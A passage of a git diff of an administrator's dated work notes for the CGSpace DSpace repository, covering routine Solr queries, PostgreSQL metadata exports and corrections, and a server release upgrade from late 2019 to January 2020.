    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:*Scrapoo*&rows=0")
    +
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:*Scrapoo*&rows=0")
     
    • If the parameters include something like “[0-9]” then curl interprets it as a range and will make ten requests
        @@ -441,7 +441,7 @@ $ http "http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
    -
    $ curl -s 'http://localhost:8081/solr/statistics/select' -d 'q=userAgent:/Postgenomic(\s|\+)v2/&rows=2'
    +
    $ curl -s 'http://localhost:8081/solr/statistics/select' -d 'q=userAgent:/Postgenomic(\s|\+)v2/&rows=2'
     
    • I updated the check-spider-hits.sh script to use the POST syntax, and I’m evaluating the feasability of including the regex search patterns from the spider agent file, as I had been filtering them out due to differences in PCRE and Solr regex syntax and issues with shell handling
    @@ -450,7 +450,7 @@ $ http "http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
  • IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary
  • I will merge them with our existing list and then resolve their names using my resolve-orcids.py script:
  • -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2019-11-14-combined-orcids.txt
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2019-11-14-combined-orcids.txt
     $ ./resolve-orcids.py -i /tmp/2019-11-14-combined-orcids.txt -o /tmp/2019-11-14-combined-names.txt -d
     # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
     $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
    diff --git a/docs/2019-12/index.html b/docs/2019-12/index.html
    index 9cd3df678..061bf5438 100644
    --- a/docs/2019-12/index.html
    +++ b/docs/2019-12/index.html
    @@ -46,7 +46,7 @@ Make sure all packages are up to date and the package manager is up to date, the
     # dpkg -C
     # reboot
     "/>
    -
    +
     
     
         
    @@ -153,7 +153,7 @@ Make sure all packages are up to date and the package manager is up to date, the
     # tar czf 2019-12-01-linode18-etc.tar.gz /etc
     
    • Then check all third-party repositories in /etc/apt to see if everything using “xenial” has packages available for “bionic” and then update the sources:
    • -
    • # sed -i ’s/xenial/bionic/' /etc/apt/sources.list.d/*.list
    • +
    • # sed -i ’s/xenial/bionic/’ /etc/apt/sources.list.d/*.list
    • Pause the Uptime Robot monitoring for CGSpace
    • Make sure the update manager is installed and do the upgrade:
    @@ -163,7 +163,7 @@ Make sure all packages are up to date and the package manager is up to date, the
  • After the upgrade finishes, remove Java 11, force the installation of bionic nginx, and reboot the server:
  • # apt purge openjdk-11-jre-headless
    -# apt install 'nginx=1.16.1-1~bionic'
    +# apt install 'nginx=1.16.1-1~bionic'
     # reboot
     
    • After the server comes back up, remove Python virtualenvs that were created with Python 3.5 and re-run certbot to make sure it’s working:
    • @@ -195,8 +195,8 @@ Make sure all packages are up to date and the package manager is up to date, the
    -
    $ http 'https://cgspace.cgiar.org/oai/request?verb=GetRecord&metadataPrefix=oai_dc&identifier=oai:cgspace.cgiar.org:10568/104030' > /tmp/cgspace-104030.xml
    -$ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&metadataPrefix=oai_dc&identifier=oai:cgspace.cgiar.org:10568/104030' > /tmp/dspacetest-104030.xml
    +
    $ http 'https://cgspace.cgiar.org/oai/request?verb=GetRecord&metadataPrefix=oai_dc&identifier=oai:cgspace.cgiar.org:10568/104030' > /tmp/cgspace-104030.xml
    +$ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&metadataPrefix=oai_dc&identifier=oai:cgspace.cgiar.org:10568/104030' > /tmp/dspacetest-104030.xml
     
    • The DSpace Test ones actually now capture the DOI, where the CGSpace doesn’t…
    • And the DSpace Test one doesn’t include review status as dc.description, but I don’t think that’s an important field
    • @@ -209,11 +209,11 @@ $ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&metadataPref
    -
    dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable='f' AND item.in_archive='t' AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable='f' AND item.in_archive='t' AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
     COPY 48
     

    2019-12-05

      -
    • Give presentation about CG Core v2 to the MEL Developers' Retreat in Nairobi, Kenya (via Skype)
    • +
    • Give presentation about CG Core v2 to the MEL Developers’ Retreat in Nairobi, Kenya (via Skype)
    • Send some pull requests to the cg-core schema repository:
      • HTML syntax fixes
      • @@ -288,14 +288,14 @@ COPY 48
      • I looked into creating RTF documents from HTML in Node.js and there is a library called html-to-rtf that works well, but doesn’t support images
      • Export a list of all investors (dc.description.sponsorship) for Peter to look through and correct:
      -
      dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.sponsor", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
      +
      dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.sponsor", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
       COPY 643
       

      2019-12-18

      • Apply the investor corrections and deletions from Peter on CGSpace:
      -
      $ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
      -$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
      +
      $ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
      +$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
       
      • Peter asked about the “Open Government Licence 3.0” that is used by some items
          @@ -304,13 +304,13 @@ $ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dsp
      -
      dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open%';
      +
      dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open%';
                text_value          
       -----------------------------
        Open Government License 3.0
        Open Government License 3.0
       (2 rows)
      -dspace=# UPDATE metadatavalue SET text_value='OGL-UK-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open Government License 3.0%';
      +dspace=# UPDATE metadatavalue SET text_value='OGL-UK-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open Government License 3.0%';
       UPDATE 2
       
      • I created a pull request to add the license and merged it to the 5_x-prod branch (#440)
      • @@ -338,12 +338,12 @@ UPDATE 2
        • I ran the dspace cleanup process on CGSpace (linode18) and had an error:
        -
        Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        -  Detail: Key (bitstream_id)=(179441) is still referenced from table "bundle".
        +
        Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        +  Detail: Key (bitstream_id)=(179441) is still referenced from table "bundle".
         
        • The solution is to delete that bitstream manually:
        -
        $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);'
        +
        $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);'
         UPDATE 1
         
        • Adjust CG Core v2 migrataion notes to use cg.review-status instead of cg.peer-reviewed diff --git a/docs/2020-01/index.html b/docs/2020-01/index.html index e091d2bd4..ce599ff12 100644 --- a/docs/2020-01/index.html +++ b/docs/2020-01/index.html @@ -56,7 +56,7 @@ I tweeted the CGSpace repository link "/> - + @@ -166,7 +166,7 @@ I tweeted the CGSpace repository link
          • Export a list of authors from CGSpace for Peter Ballantyne to look through and correct:
          -
          dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
          +
          dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
           COPY 68790
           
          • As I always have encoding issues with files Peter sends, I tried to convert it to some Windows encoding, but got an error:
          • @@ -176,10 +176,10 @@ iconv: illegal input sequence at position 104779
          • According to this trick the troublesome character is on line 5227:
          -
          $ awk 'END {print NR": "$0}' /tmp/2020-01-08-authors-windows.csv                                   
          -5227: "Oue
          -$ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
          -00000000: 22  "
          +
          $ awk 'END {print NR": "$0}' /tmp/2020-01-08-authors-windows.csv                                   
          +5227: "Oue
          +$ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
          +00000000: 22  "
           00000001: 4f  O
           00000002: 75  u
           00000003: 65  e
          @@ -225,30 +225,30 @@ java.net.SocketTimeoutException: Read timed out
           
      -
      In [7]: unicodedata.is_normalized('NFC', 'é')
      +
      In [7]: unicodedata.is_normalized('NFC', 'é')
       Out[7]: False
       
      -In [8]: unicodedata.is_normalized('NFC', 'é')
      +In [8]: unicodedata.is_normalized('NFC', 'é')
       Out[8]: True
       

      2020-01-15

      • I added support for Unicode normalization to my csv-metadata-quality tool in v0.4.0
      • Generate ILRI and Bioversity subject lists for Elizabeth Arnaud from Bioversity:
      -
      dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.ilri", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
      +
      dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.ilri", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
       COPY 144
      -dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.bioversity", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
      +dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.bioversity", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
       COPY 1325
       
      • She will be meeting with FAO and will look over the terms to see if they can add some to AGROVOC
      • I noticed a few errors in the ILRI subjects so I fixed them locally and on CGSpace (linode18) using my fix-metadata.py script:
      -
      $ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
      +
      $ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
       

      2020-01-16

      • Extract a list of CIAT subjects from CGSpace for Elizabeth Arnaud from Bioversity:
      -
      dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.ciat", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
      +
      dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.ciat", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
       COPY 35
       
      • Start examining the 175 IITA records that Bosede originally sent in October, 2019 (201907.xls) @@ -315,15 +315,15 @@ COPY 35
    -
    $ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct -d
    +
    $ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct -d
     
    • Then I decided to export them again (with two author columns) so I can perform the new Unicode normalization mode I added to csv-metadata-quality:
    -
    dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
     COPY 67314
     dspace=# \q
    -$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],dc.contributor.author'
    -$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
    +$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],dc.contributor.author'
    +$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
     
    • Peter asked me to send him a list of affiliations to correct
        @@ -331,11 +331,11 @@ $ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -
    -
    dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", text_value as "correct", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", text_value as "correct", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
     COPY 6170
     dspace=# \q
    -$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
    -$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -n
    +$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
    +$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -n
     
    • I applied the corrections on DSpace Test and CGSpace, and then scheduled a full Discovery reindex for later tonight:
    @@ -343,7 +343,7 @@ $ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dsp
    • Then I generated a new list for Peter:
    -
    dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
     COPY 6162
     
    • Abenet said she noticed that she gets different results on AReS and Atmire Listing and Reports, for example with author “Hung, Nguyen” @@ -352,8 +352,8 @@ COPY 6162
    -
    $ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E 's/10568 ([0-9]+)/10568\/\1/' | csvcut -c Handle | grep -v Handle | sort -u > hung-nguyen-ares-handles.txt
    -$ grep -oE '10568\/[0-9]+' hung-nguyen-atmire.txt | sort -u > hung-nguyen-atmire-handles.txt
    +
    $ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E 's/10568 ([0-9]+)/10568\/\1/' | csvcut -c Handle | grep -v Handle | sort -u > hung-nguyen-ares-handles.txt
    +$ grep -oE '10568\/[0-9]+' hung-nguyen-atmire.txt | sort -u > hung-nguyen-atmire-handles.txt
     $ wc -l hung-nguyen-a*handles.txt
       46 hung-nguyen-ares-handles.txt
       56 hung-nguyen-atmire-handles.txt
    @@ -374,7 +374,7 @@ $ wc -l hung-nguyen-a*handles.txt
     
     
     
    -
    # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2020:0[12345678]" | goaccess --log-format=COMBINED -
    +
    # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2020:0[12345678]" | goaccess --log-format=COMBINED -
     
    • The top two hosts according to the amount of data transferred are:
        @@ -404,9 +404,9 @@ $ convert -thumbnail x600 10568-97925.pdf.jpg 10568-97925-thumbnail.pdf.jpg
      • The file size is about double the old ones, but the quality is very good and the file size is nowhere near ilri.org’s 400KiB PNG!
      • Peter sent me the corrections and deletions for affiliations last night so I imported them into OpenRefine to work around the normal UTF-8 issue, ran them through csv-metadata-quality to make sure all Unicode values were normalized (NFC), then applied them on DSpace Test and CGSpace:
      -
      $ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
      -$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct
      -$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
      +
      $ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
      +$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct
      +$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
       

      2020-01-26

      • Add “Gender” to controlled vocabulary for CRPs (#442)
      • @@ -426,9 +426,9 @@ $ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db
      • One thing worth mentioning was this syntax for extracting bits from JSON in bash using jq:
      -
      $ RESPONSE=$(curl -s 'https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams')
      -$ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName=="ORIGINAL") | .retrieveLink'
      -"/bitstreams/172559/retrieve"
      +
      $ RESPONSE=$(curl -s 'https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams')
      +$ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName=="ORIGINAL") | .retrieveLink'
      +"/bitstreams/172559/retrieve"
       

      2020-01-27

      • Bizu has been having problems when she logs into CGSpace, she can’t see the community list on the front page @@ -439,7 +439,7 @@ $ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName=="ORIGINAL")
      2020-01-27 06:02:23,681 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
      -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] ': too many boolean clauses
      +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] ': too many boolean clauses
       
      • Now this appears to be a Solr limit of some kind (“too many boolean clauses”)
          @@ -453,7 +453,7 @@ org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError:
          • Generate a list of CIP subjects for Abenet:
          -
          dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.cip", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
          +
          dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.cip", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
           COPY 77
           
          • Start looking over the IITA records from earlier this month (IITA_201907_Jan13) @@ -483,33 +483,33 @@ COPY 77
            • Normalize about 4,500 DOI, YouTube, and SlideShare links on CGSpace that are missing HTTPS or using old format:
            -
            UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://www.doi.org%';
            -UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://doi.org%';
            -UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://dx.doi.org%';
            -UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
            -UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.youtube.com', 'https://www.youtube.com') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.youtube.com%';
            -UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.slideshare.net', 'https://www.slideshare.net') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.slideshare.net%';
            +
            UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://www.doi.org%';
            +UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://doi.org%';
            +UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://dx.doi.org%';
            +UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
            +UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.youtube.com', 'https://www.youtube.com') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.youtube.com%';
            +UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.slideshare.net', 'https://www.slideshare.net') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.slideshare.net%';
             
            • I exported a list of all of our ISSNs with item IDs so that I could fix them in OpenRefine and submit them with multi-value separators to DSpace metadata import:
            -
            dspace=# \COPY (SELECT resource_id as "id", text_value as "dc.identifier.issn" FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
            +
            dspace=# \COPY (SELECT resource_id as "id", text_value as "dc.identifier.issn" FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
             COPY 23339
             
            • Then, after spending two hours correcting 1,000 ISSNs I realized that I need to normalize the text_lang fields in the database first or else these will all look like changes due to the “en_US” and NULL, etc (for both ISSN and ISBN):
            -
            dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
            +
            dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
             UPDATE 30454
             
            • Then I realized that my initial PostgreSQL query wasn’t so genius because if a field already has multiple values it will appear on separate lines with the same ID, so when dspace metadata-import sees it, the change will be removed and added, or added and removed, depending on the order it is seen!
            • A better course of action is to select the distinct ones and then correct them using fix-metadata-values.py
            -
            dspace=# \COPY (SELECT DISTINCT text_value as "dc.identifier.issn[en_US]", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
            +
            dspace=# \COPY (SELECT DISTINCT text_value as "dc.identifier.issn[en_US]", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
             COPY 2900
             
            • I re-applied all my corrections, filtering out things like multi-value separators and values that are actually ISBNs so I can fix them later
            • Then I applied 181 fixes for ISSNs using fix-metadata-values.py on DSpace Test and CGSpace (after testing locally):
            -
            $ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p 'fuuu' -f 'dc.identifier.issn[en_US]' -m 21 -t correct -d
            +
            $ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p 'fuuu' -f 'dc.identifier.issn[en_US]' -m 21 -t correct -d
             

